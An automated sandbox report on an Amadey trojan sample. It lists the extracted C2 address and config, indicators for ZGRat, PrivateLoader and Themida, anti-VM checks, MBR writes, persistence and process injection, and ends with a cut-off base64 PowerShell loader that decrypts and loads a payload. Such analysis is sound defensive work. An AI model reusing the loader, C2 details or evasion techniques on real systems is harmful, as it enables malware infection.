amadey | ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd

Analysis

max time kernel
47s
max time network
82s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
14-05-2024 22:31

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Size

1.8MB
MD5

a99882f9b749bc3828ae0bbba5f8ab42
SHA1

245713f0928010e1534fd2ddef7788b77ebeabde
SHA256

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd
SHA512

9c641af50a8132673e0af32f1eee948bba1a4d6156e76d1141f7fcefc8078b8abe8360c50878ba95899669ee952b988d0169eb9bc3a0a246d9a91af60cb151a5
SSDEEP

49152:daXs8646GIMTbxlNYvYrhxajmczF772EPUlD0:MX9f6GI+NP2uJUaEPUK

Score

10^/10

amadey privateloader zgrat bootkit evasion execution loader persistence rat themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 33 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3744-66-0x0000000006470000-0x00000000066B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-70-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-74-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-76-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-80-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-86-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-94-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-103-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-100-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-98-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-96-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-106-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-105-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-88-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-92-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-91-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-84-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-82-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-78-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-72-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-69-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-114-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-128-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-125-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-131-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-126-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-122-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-121-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-118-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-116-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-110-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-108-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3744-112-0x0000000006470000-0x00000000066AA000-memory.dmp	family_zgrat_v1

Modifies firewall policy service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

NKbcvg1fN17bzpud2DU6qT9n.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" NKbcvg1fN17bzpud2DU6qT9n.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	NKbcvg1fN17bzpud2DU6qT9n.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exeaxplons.exeaxplons.exeNKbcvg1fN17bzpud2DU6qT9n.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	NKbcvg1fN17bzpud2DU6qT9n.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2848	powershell.exe
5224	powershell.exe
3092	powershell.exe
4968	powershell.exe
2476	powershell.exe
5844	powershell.exe
5836	powershell.exe
5668	powershell.exe
928	powershell.exe
1432	powershell.exe
4576	powershell.exe
2220	powershell.exe
1240	powershell.exe
5380	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

NKbcvg1fN17bzpud2DU6qT9n.exead8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exeaxplons.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NKbcvg1fN17bzpud2DU6qT9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NKbcvg1fN17bzpud2DU6qT9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe

Drops startup file 8 IoCs

Processes:

regsvcs.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\j7myrzntLHBy9PmqxOoIRy8F.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nzvSmBu3bgnsAGBGQ2VAjigr.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uXOL6uqqtwwCgpFuppFBndQj.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ihp9iVJNsM3W4cjsNsbPQEdF.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AovjukrgyGrIKx2pko7uGisG.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mvvQhZjlo3BZ8rjXjcHRkKxr.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hG0G1wwlExHx5RpOcaey9Dv4.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zSh1RSeLNu0hMJLGfxAEyhnh.bat	regsvcs.exe

Executes dropped EXE 11 IoCs

Processes:

axplons.exefile300un.exeKaxhwswfup.exeaxplons.exe6xOCmKhyvWRWA8kLRIwcZuke.exeJ2NHtBd30dhUI9NDb9zx4aqF.exehog7t7dO6fnUh1lzX8M7VnMA.exeR4oZcOJIs38i3KHiWn54aELc.exeZZRvujv8PzIBUqrweqU2X2lK.exe87TiwtYC2BtXF6I7wYlwBSOg.exeNKbcvg1fN17bzpud2DU6qT9n.exe

pid	process
4768	axplons.exe
3220	file300un.exe
3744	Kaxhwswfup.exe
868	axplons.exe
4760	6xOCmKhyvWRWA8kLRIwcZuke.exe
3820	J2NHtBd30dhUI9NDb9zx4aqF.exe
1160	hog7t7dO6fnUh1lzX8M7VnMA.exe
4964	R4oZcOJIs38i3KHiWn54aELc.exe
4936	ZZRvujv8PzIBUqrweqU2X2lK.exe
1340	87TiwtYC2BtXF6I7wYlwBSOg.exe
4252	NKbcvg1fN17bzpud2DU6qT9n.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	axplons.exe

Loads dropped DLL 1 IoCs

Processes:

ZZRvujv8PzIBUqrweqU2X2lK.exe

pid process

4936 ZZRvujv8PzIBUqrweqU2X2lK.exe
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
themida

Processes:

resource yara_rule

C:\Users\Admin\Pictures\NKbcvg1fN17bzpud2DU6qT9n.exe themida
behavioral2/memory/4252-5081-0x0000000140000000-0x0000000140F7A000-memory.dmp themida
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

NKbcvg1fN17bzpud2DU6qT9n.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NKbcvg1fN17bzpud2DU6qT9n.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

4 pastebin.com
5 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ipinfo.io
12 api.myip.com
51 api.myip.com
52 ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

ZZRvujv8PzIBUqrweqU2X2lK.exe

description ioc process

File opened for modification \??\PhysicalDrive0 ZZRvujv8PzIBUqrweqU2X2lK.exe

pid	process
4936	ZZRvujv8PzIBUqrweqU2X2lK.exe

resource	yara_rule
C:\Users\Admin\Pictures\NKbcvg1fN17bzpud2DU6qT9n.exe	themida
behavioral2/memory/4252-5081-0x0000000140000000-0x0000000140F7A000-memory.dmp	themida

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NKbcvg1fN17bzpud2DU6qT9n.exe

flow	ioc
4	pastebin.com
5	pastebin.com

flow	ioc
4	ipinfo.io
12	api.myip.com
51	api.myip.com
52	ipinfo.io

description	ioc	process
File opened for modification	\??\PhysicalDrive0	ZZRvujv8PzIBUqrweqU2X2lK.exe

Drops file in System32 directory 4 IoCs

Processes:

NKbcvg1fN17bzpud2DU6qT9n.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	NKbcvg1fN17bzpud2DU6qT9n.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	NKbcvg1fN17bzpud2DU6qT9n.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	NKbcvg1fN17bzpud2DU6qT9n.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	NKbcvg1fN17bzpud2DU6qT9n.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exeaxplons.exeaxplons.exeNKbcvg1fN17bzpud2DU6qT9n.exe

pid process

868 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
4768 axplons.exe
868 axplons.exe
4252 NKbcvg1fN17bzpud2DU6qT9n.exe
4252 NKbcvg1fN17bzpud2DU6qT9n.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 928 set thread context of 4916 928 powershell.exe regsvcs.exe
Drops file in Windows directory 1 IoCs

Processes:

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe

description ioc process

File created C:\Windows\Tasks\axplons.job ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 928 set thread context of 4916	928	powershell.exe	regsvcs.exe

description	ioc	process
File created	C:\Windows\Tasks\axplons.job	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe

Program crash 11 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
924	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
1956	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
2700	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
2808	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
2476	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
5104	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
1868	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
744	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
3384	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
2044	4760	WerFault.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
4968	3408	WerFault.exe	$77935704

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4380 schtasks.exe
5412 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2552 taskkill.exe

pid	process
4380	schtasks.exe
5412	schtasks.exe

pid	process
2552	taskkill.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exeaxplons.exepowershell.exeaxplons.exeZZRvujv8PzIBUqrweqU2X2lK.exe

pid	process
868	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
868	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
4768	axplons.exe
4768	axplons.exe
928	powershell.exe
928	powershell.exe
868	axplons.exe
868	axplons.exe
928	powershell.exe
928	powershell.exe
928	powershell.exe
4936	ZZRvujv8PzIBUqrweqU2X2lK.exe
4936	ZZRvujv8PzIBUqrweqU2X2lK.exe
4936	ZZRvujv8PzIBUqrweqU2X2lK.exe
4936	ZZRvujv8PzIBUqrweqU2X2lK.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeKaxhwswfup.exeregsvcs.exeZZRvujv8PzIBUqrweqU2X2lK.exe

description	pid	process
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	3744	Kaxhwswfup.exe
Token: SeDebugPrivilege	4916	regsvcs.exe
Token: SeManageVolumePrivilege	4936	ZZRvujv8PzIBUqrweqU2X2lK.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe

pid process

868 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exeaxplons.exefile300un.exepowershell.exeregsvcs.exe

description	pid	process	target process
PID 868 wrote to memory of 4768	868	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe	axplons.exe
PID 868 wrote to memory of 4768	868	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe	axplons.exe
PID 868 wrote to memory of 4768	868	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe	axplons.exe
PID 4768 wrote to memory of 3220	4768	axplons.exe	file300un.exe
PID 4768 wrote to memory of 3220	4768	axplons.exe	file300un.exe
PID 3220 wrote to memory of 928	3220	file300un.exe	powershell.exe
PID 3220 wrote to memory of 928	3220	file300un.exe	powershell.exe
PID 4768 wrote to memory of 3744	4768	axplons.exe	Kaxhwswfup.exe
PID 4768 wrote to memory of 3744	4768	axplons.exe	Kaxhwswfup.exe
PID 4768 wrote to memory of 3744	4768	axplons.exe	Kaxhwswfup.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 4916	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 1132	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 1132	928	powershell.exe	regsvcs.exe
PID 928 wrote to memory of 1132	928	powershell.exe	regsvcs.exe
PID 4916 wrote to memory of 4760	4916	regsvcs.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
PID 4916 wrote to memory of 4760	4916	regsvcs.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
PID 4916 wrote to memory of 4760	4916	regsvcs.exe	6xOCmKhyvWRWA8kLRIwcZuke.exe
PID 4916 wrote to memory of 3820	4916	regsvcs.exe	J2NHtBd30dhUI9NDb9zx4aqF.exe
PID 4916 wrote to memory of 3820	4916	regsvcs.exe	J2NHtBd30dhUI9NDb9zx4aqF.exe
PID 4916 wrote to memory of 3820	4916	regsvcs.exe	J2NHtBd30dhUI9NDb9zx4aqF.exe
PID 4916 wrote to memory of 1160	4916	regsvcs.exe	hog7t7dO6fnUh1lzX8M7VnMA.exe
PID 4916 wrote to memory of 1160	4916	regsvcs.exe	hog7t7dO6fnUh1lzX8M7VnMA.exe
PID 4916 wrote to memory of 1160	4916	regsvcs.exe	hog7t7dO6fnUh1lzX8M7VnMA.exe
PID 4916 wrote to memory of 4964	4916	regsvcs.exe	R4oZcOJIs38i3KHiWn54aELc.exe
PID 4916 wrote to memory of 4964	4916	regsvcs.exe	R4oZcOJIs38i3KHiWn54aELc.exe
PID 4916 wrote to memory of 4964	4916	regsvcs.exe	R4oZcOJIs38i3KHiWn54aELc.exe
PID 4916 wrote to memory of 4936	4916	regsvcs.exe	ZZRvujv8PzIBUqrweqU2X2lK.exe
PID 4916 wrote to memory of 4936	4916	regsvcs.exe	ZZRvujv8PzIBUqrweqU2X2lK.exe
PID 4916 wrote to memory of 4936	4916	regsvcs.exe	ZZRvujv8PzIBUqrweqU2X2lK.exe
PID 4916 wrote to memory of 1340	4916	regsvcs.exe	87TiwtYC2BtXF6I7wYlwBSOg.exe
PID 4916 wrote to memory of 1340	4916	regsvcs.exe	87TiwtYC2BtXF6I7wYlwBSOg.exe
PID 4916 wrote to memory of 1340	4916	regsvcs.exe	87TiwtYC2BtXF6I7wYlwBSOg.exe
PID 4916 wrote to memory of 4252	4916	regsvcs.exe	NKbcvg1fN17bzpud2DU6qT9n.exe
PID 4916 wrote to memory of 4252	4916	regsvcs.exe	NKbcvg1fN17bzpud2DU6qT9n.exe

C:\Users\Admin\AppData\Local\Temp\ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
"C:\Users\Admin\AppData\Local\Temp\ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:868

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4768

C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQB